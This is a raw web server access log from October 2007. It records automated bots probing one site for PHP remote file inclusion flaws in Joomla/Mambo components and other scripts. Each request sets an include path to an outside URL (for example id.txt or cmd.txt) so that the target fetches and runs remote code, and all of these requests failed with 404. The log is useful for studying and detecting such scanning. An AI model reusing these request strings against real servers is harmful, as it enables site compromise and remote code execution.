62.75.162.34 - - [21/Oct/2007:17:18:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:18:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:18:47 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
193.25.197.121 - - [21/Oct/2007:17:18:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:18:48 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:18:49 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:18:49 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:18:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:18:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:18:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:18:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:18:51 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:18:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:18:59 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:19:01 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:19:01 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
193.25.197.121 - - [21/Oct/2007:17:19:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:19:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:19:07 -0700] "GET /logs/access_070826.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:19:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:19:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:19:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:19:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:19:42 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:19:42 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:19:48 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:19:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:19:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:19:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:19:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:19:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:19:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:19:53 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:20:15 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:20:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:20:15 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:20:17 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:20:18 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:20:18 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.152.222.4 - - [21/Oct/2007:17:20:29 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:20:29 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:20:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:20:39 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:20:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:20:39 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:20:41 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:20:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:20:41 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.195.11.193 - - [21/Oct/2007:17:20:55 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
200.195.11.193 - - [21/Oct/2007:17:20:55 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:20:56 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.0.200.9 - - [21/Oct/2007:17:21:12 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.0.200.9 - - [21/Oct/2007:17:21:13 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.192.85.39 - - [21/Oct/2007:17:21:14 -0700] "GET /logs/access_070826.log/index2.php?x=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:21:22 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:21:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:21:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.233.133.219 - - [21/Oct/2007:17:22:04 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.233.133.219 - - [21/Oct/2007:17:22:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:22:08 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.126.193.82 - - [21/Oct/2007:17:22:13 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:22:27 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
65.61.166.77 - - [21/Oct/2007:17:23:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.61.166.77 - - [21/Oct/2007:17:23:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:23:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:23:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
88.198.68.233 - - [21/Oct/2007:17:23:08 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.198.68.233 - - [21/Oct/2007:17:23:08 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.198.68.233 - - [21/Oct/2007:17:23:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.198.68.233 - - [21/Oct/2007:17:23:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:23:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:23:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:23:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:23:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:24:02 -0700] "GET /logs/access_070826.log/admin/spaw/spaw_control.class.php?spaw_root=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:24:03 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.88.183.189 - - [21/Oct/2007:17:24:03 -0700] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:24:03 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:24:04 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:24:07 -0700] "GET /newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:24:08 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:24:12 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:24:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:24:13 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:24:13 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:24:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:24:14 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:24:15 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:24:16 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.75.162.34 - - [21/Oct/2007:17:24:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:24:16 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:24:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:24:17 -0700] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.88.183.189 - - [21/Oct/2007:17:24:23 -0700] "GET /newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:24:27 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:24:39 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:24:40 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
204.187.100.101 - - [21/Oct/2007:17:25:08 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:25:08 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:25:14 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:25:33 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:25:42 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.205.60.84 - - [21/Oct/2007:17:26:04 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.galf.org"
61.205.60.84 - - [21/Oct/2007:17:26:04 -0700] "GET //components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.galf.org"
196.38.88.57 - - [21/Oct/2007:17:26:27 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
196.38.88.57 - - [21/Oct/2007:17:26:28 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
193.25.197.125 - - [21/Oct/2007:17:26:28 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:26:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:26:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:26:53 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.25.197.125 - - [21/Oct/2007:17:26:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:26:54 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.124.37.50 - - [21/Oct/2007:17:26:59 -0700] "GET /logs/access_070826.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.124.37.50 - - [21/Oct/2007:17:26:59 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.124.37.50 - - [21/Oct/2007:17:27:00 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.114.104.23 - - [21/Oct/2007:17:27:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.heroesofsand.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.114.104.23 - - [21/Oct/2007:17:27:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.heroesofsand.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.5.54.20 - - [21/Oct/2007:17:27:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
